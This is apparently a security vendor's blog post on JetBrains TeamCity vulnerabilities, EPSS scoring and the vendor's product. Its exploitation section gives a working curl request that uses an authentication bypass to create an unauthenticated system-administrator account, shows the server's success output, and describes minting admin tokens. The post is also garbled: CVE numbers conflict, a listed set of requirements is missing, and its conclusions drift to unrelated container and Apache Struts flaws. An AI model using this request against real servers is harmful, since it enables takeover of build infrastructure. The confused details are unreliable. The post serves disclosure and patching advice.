Two recent vulnerabilities, CVE-2024-23917 and CVE-2024-27199, have emerged within JetBrains software, highlighting the need for robust vulnerability management strategies and shedding light on the importance of the Exploit Prediction Scoring System (EPSS), vulnerability management and identifying critical software at scale.
Exploits available
The two vulnerabilities were discovered by Stephen Fewer, a principal security researcher at Rapid7, and reported to JetBrains in mid-February.
- CVE-2024-27198 (critical, 9.8 severity): an authentication bypass vulnerability in the web component of TeamCity generated by an alternative path issue
- CVE-2024-27199 (high, 7.3 severity): a path traversal vulnerability in the web component of TeamCity that allows bypassing authentication
The researchers warn that CVE-2024-27198 can give an attacker complete control over a vulnerable TeamCity On-Premises server, including for remote code execution.
The CVE-2024-23917 Vulnerability: A Closer Look
CVE-2024-23917 represents a significant security threat, having been identified as a critical vulnerability within JetBrains software. This vulnerability underscores the risks associated with insufficient authentication mechanisms, potentially allowing unauthenticated attackers to gain administrative control over affected systems. The severity of CVE-2024-23917, with a high CVSS score, emphasizes the urgency for organizations to adopt comprehensive vulnerability management practices to mitigate the risk of exploitation.
CVE-2024-27199: Path Traversal and Authentication Bypass
On the heels of CVE-2024-23917, the cybersecurity community has turned its attention to another vulnerability within JetBrains software, CVE-2024-27199. Characterized by a path traversal flaw, CVE-2024-27199 enables attackers to bypass authentication controls, presenting a significant threat to the integrity and confidentiality of systems. Like its predecessor, CVE-2024-27199 has received a notable CVSS score, prompting immediate action from JetBrains in the form of patches and security updates.
The Role of JetBrains in Vulnerability Management
JetBrains, a leading developer of software development tools, has responded swiftly to these vulnerabilities by releasing updates and patches aimed at securing affected systems. The company’s commitment to addressing these vulnerabilities exemplifies the critical role that software vendors play in the broader vulnerability management ecosystem. Organizations relying on JetBrains software are encouraged to implement these updates promptly, as part of their overarching cybersecurity strategy.
Exploitation of CVE-2024-23917 and CVE-2024-27199
Activity around these vulnerabilities has been recently evidenced by shadowserver
Whilst CISA has not yet disclosed this, the criticality of the vulnerabilities is evident by both the easiness of exploitation and evidence of exploit being leverage by Russian and North Korean
“The U.S. Federal Bureau of Investigation (FBI), U.S. Cybersecurity & Infrastructure Security Agency (CISA), U.S. National Security Agency (NSA), Polish Military Counterintelligence Service (SKW), CERT Polska (CERT.PL), and the UK’s National Cyber Security Centre (NCSC) assess Russian Foreign Intelligence Service (SVR) cyber actors—also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and NOBELIUM/Midnight Blizzard—are exploiting CVE-2023-42793 at a large scale, targeting servers hosting JetBrains TeamCity software since September 2023.” CISA
With rump up of exploitability EPSS still needs to pick the second one up whilst the CVE-202342793 is already epss: 0.973450000
this one up
CVE-2024-27199, with epss : 0.000430000
And
Triggering the vulnerability CVE-202342793 and CVE-2024-27199
Triggering the vulnerability
To see how to leverage this vulnerability, we can target an example endpoint. The /app/rest/server endpoint will return the current server version information. If we directly request this endpoint, the request will fail as the request is unauthenticated.
| C:\Users\sfewer>curl -ik http://172.29.228.65:8111/app/rest/server HTTP/1.1 401 TeamCity-Node-Id: MAIN_SERVER WWW-Authenticate: Basic realm=”TeamCity” WWW-Authenticate: Bearer realm=”TeamCity” Cache-Control: no-store Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Date: Wed, 14 Feb 2024 17:20:05 GMT Authentication required To login manually go to “/login.html” page |
To leverage this vulnerability to successfully call the authenticated endpoint /app/rest/server, an unauthenticated attacker must satisfy the following three requirements during an HTTP(S) request:
The exploitation of the CVE-related authentication bypass vulnerability within JetBrains TeamCity software demonstrates a significant security threat, enabling attackers to take comprehensive control over the affected servers.
This vulnerability allows an unauthenticated attacker to manipulate the server by creating a new administrator account or generating a new administrator access token through relatively simple HTTP requests.
For instance, by targeting the /app/rest/users REST API endpoint, an attacker can craft a command to create a new administrator user with full privileges. This is achieved by sending a specially crafted POST request containing JSON data that specifies the new user’s username, password, email, and roles, effectively bypassing authentication mechanisms.
The successful execution of this command is confirmed by a 200 HTTP response, which includes an XML payload detailing the new user’s credentials and roles, demonstrating that the attacker has successfully gained administrative access.
C:\Users\sfewer>curl -ik http://172.29.228.65:8111/hax?jsp=/app/rest/users;.jsp -X POST -H "Content-Type: application/json" --data "{\"username\": \"haxor\", \"password\": \"haxor\", \"email\": \"haxor\", \"roles\": {\"role\": [{\"roleId\": \"SYSTEM_ADMIN\", \"scope\": \"g\"}]}}" HTTP/1.1 200TeamCity-Node-Id: MAIN_SERVER Cache-Control: no-store Content-Type: application/xml;charset=ISO-8859-1 Content-Language: en-IE Content-Length: 661<?xml version="1.0" encoding="UTF-8" standalone="yes"?><user username="haxor" id="18" email="haxor" href="/app/rest/users/id:18"><properties count="3" href="/app/rest/users/id:18/properties"><property name="addTriggeredBuildToFavorites" value="true"/><property name="plugin:vcs:anyVcs:anyVcsRoot" value="haxor"/><property name="teamcity.server.buildNumber" value="147512"/></properties><roles><role roleId="SYSTEM_ADMIN" scope="g" href="/app/rest/users/id:18/roles/SYSTEM_ADMIN/g"/></roles><groups count="1"><group key="ALL_USERS_GROUP" name="All Users" href="/app/rest/userGroups/key:ALL_USERS_GROUP" description="Contains all TeamCity users"/></groups></user>Date: Wed, 14 Feb 2024 17:33:32 GMT |
Moreover, attackers can further exploit this vulnerability by generating new administrator access tokens. This is accomplished by sending a POST request to the /app/rest/users/id:1/tokens/HaxorToken endpoint. The server’s response to this request confirms the creation of the token, granting the attacker another method to access the server with elevated privileges.
Both methods—creating a new administrator user and generating an administrator access token—provide attackers with powerful tools to gain unauthorized control over TeamCity servers. This control extends to all projects, builds, agents, and artefacts associated with the compromised server, posing a critical threat to the integrity and security of the software development and deployment process. Addressing this vulnerability requires immediate action from administrators, including applying patches provided by JetBrains and reviewing system access controls and activity logs for any signs of unauthorized access or manipulation.
Leveraging EPSS for Proactive Security
The Exploit Prediction Scoring System (EPSS) offers a data-driven approach to assessing the likelihood of vulnerability exploitation. By integrating EPSS into vulnerability management processes, organizations can prioritize remediation efforts based on the risk profile of each vulnerability. EPSS scores for CVE-2024-23917 and CVE-2024-27199 provide valuable insights into the potential for these vulnerabilities to be exploited, enabling more informed decision-making and resource allocation.
whilst the CVE-202342793 is already epss: 0.973450000
The CVE-2024-27199, with epss : 0.000430000 needs still adjustment
Check out the guide Phoenix security EPSS
Check out the data explorers
CISA KEV: https://phoenix.security/what-is-cisa-kev-main/
Exploit in the wild: https://phoenix.security/what-is-exploitability/
OWASP/Appsec Vulnerability: https://phoenix.security/what-is-owasp-main/
CWE/Appsec Vulnerabilities: https://phoenix.security/what-is-cwe-main/
Conclusion: A Call for Comprehensive Cybersecurity Measures
The discovery of CVE-2024-23917 and CVE-2024-27199 within JetBrains software serves as a stark reminder of the ever-present threat posed by cybersecurity vulnerabilities. As organizations navigate the complexities of the digital age, the importance of vulnerability management, bolstered by tools like EPSS, cannot be overstated. Proactive security measures, including regular software updates and patches, are essential for safeguarding critical infrastructure and protecting sensitive information from potential threats.
In conclusion, the cybersecurity landscape continues to evolve, with vulnerabilities like CVE-2024-23917 and CVE-2024-27199 representing both challenges and opportunities for improvement. By embracing a holistic approach to vulnerability management and leveraging predictive tools such as EPSS, organizations can strengthen their defenses and maintain resilience against cyber threats.
Conclusion
The discovery of the “Leaky Vessels” vulnerabilities serves as a critical reminder of the inherent risks in containerized environments and the need for proactive vulnerability management and application security practices. By staying informed about potential vulnerabilities, applying timely updates, and employing comprehensive security strategies, organizations can navigate the choppy waters of container security and safeguard their applications against emerging threats.
How Phoenix Security Can Help
Phoenix Security ASPM helps organizations identify and trace which systems have vulnerabilities, understanding the relation between code and cloud. One of the significant challenges in securing applications is knowing where software like jet brain is installed and how could impact the whole organization. ASPM – Vulnerability management tools can help scale your vulnerability management and identify instances of JetBrain, mapping out where it is deployed across the organization. This information is crucial for targeted security measures and efficient patch management. Phoenix Security’s robust Application Security Posture Management (ASPM) system is adept at not just managing, but preempting the exploitation of vulnerabilities through its automated identification system. This system prioritises critical vulnerabilities, ensuring that teams can address the most pressing threats first, optimising resource allocation and remediation efforts.
The Role of Application Security Posture Management (ASPM):
ASPM is vital in managing and securing applications like those built with Apache Struts. It involves continuous assessment, monitoring, and improvement of the security posture of applications. ASPM tools can:
- Identify and Track Struts Components: Locate where Struts is implemented within the application infrastructure.
- Vulnerability Management: Detect known vulnerabilities in Struts and prioritize them for remediation.
- Configuration Monitoring: Ensure Struts configurations adhere to best security practices.
- Compliance: Check if the usage of Struts aligns with relevant cybersecurity regulations and standards.
By leveraging Phoenix Security, you not only unravel the potential threats but also take a significant stride in vulnerability management, ensuring your application security remains up to date and focuses on the key vulnerabilities.
Get in control of your Application Security posture and Vulnerability management
Previous Issues of Vulnerability Weekly
- Apache Active MQ
- Atlassian Critical Vulnerability Exploited by nation-state CVE-2023-22515
- Critical vulnerability F5
- How to update curl and libcurl without panic fixing
- Critical Vulnerabilities in Atlassian Confluence: Zero-Day
- Detect & Mitigate HTTP/2: Rapid Reset Vulnerabilities
- Understanding the libcue Vulnerability CVE-2023
- Understanding and fixing Curl and libcurl
- MOVEit Transfer breach, Zellis compromise CVE-2023-34362
Other Useful resources
Data Visualization of vulnerabilities in the wild
- CISA KEV: https://phoenix.security/what-is-cisa-kev-main/
- Exploit in the wild: https://phoenix.security/what-is-exploitability/
- OWASP/Appsec Vulnerability: https://phoenix.security/what-is-owasp-main/
- CWE/Appsec Vulnerabilities: https://phoenix.security/what-is-cwe-main/
